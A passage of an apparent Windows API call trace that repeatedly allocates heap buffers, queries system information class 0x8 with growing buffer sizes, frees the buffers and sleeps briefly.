(HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0284.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0284.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0284.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0284.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.921] Sleep (dwMilliseconds=0x110) [0284.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0284.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.935] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0284.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0284.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0284.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0284.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0284.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0284.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0284.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.937] Sleep (dwMilliseconds=0x110) [0285.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0285.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0285.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0285.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0285.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0285.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0285.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0285.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0285.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.282] Sleep (dwMilliseconds=0x110) [0285.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0285.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0285.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0285.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0285.305] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0285.305] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.306] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0285.306] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0285.306] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.307] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0285.307] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.308] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.308] Sleep (dwMilliseconds=0x110) [0285.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0285.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0285.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0285.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0285.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0285.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0285.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0285.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0285.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.319] Sleep (dwMilliseconds=0x110) [0285.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0285.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0285.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0285.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0285.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0285.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0285.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0285.396] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0285.397] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.398] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.398] Sleep (dwMilliseconds=0x110) [0285.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0285.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0285.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0285.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0285.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0285.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0285.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0285.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0285.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.409] Sleep (dwMilliseconds=0x110) [0285.419] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0285.419] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.420] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0285.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0285.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.421] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0285.421] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0285.421] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.421] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0285.421] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0285.421] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0285.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.422] Sleep (dwMilliseconds=0x110) [0285.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0285.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0285.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0285.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0285.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0285.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0285.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0285.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0285.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.441] Sleep (dwMilliseconds=0x110) [0285.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0285.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0285.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0285.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0285.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0285.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0285.459] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0285.459] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.460] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0285.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.461] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.461] Sleep (dwMilliseconds=0x110) [0285.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0285.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0285.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0285.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0285.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0285.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0285.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0285.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0285.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.469] Sleep (dwMilliseconds=0x110) [0285.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0285.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0285.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0285.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0285.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0285.492] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0285.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0285.492] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.493] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0285.493] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.493] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.493] Sleep (dwMilliseconds=0x110) [0285.508] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0285.508] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.509] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0285.509] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0285.509] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.509] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0285.509] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0285.509] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.510] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0285.510] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0285.510] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.510] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0285.510] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.510] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.510] Sleep (dwMilliseconds=0x110) [0285.539] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0285.540] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.540] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0285.540] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0285.540] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.541] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0285.541] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0285.541] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.541] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0285.541] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0285.541] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.542] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0285.542] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.542] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.543] Sleep (dwMilliseconds=0x110) [0285.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0285.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0285.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0285.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 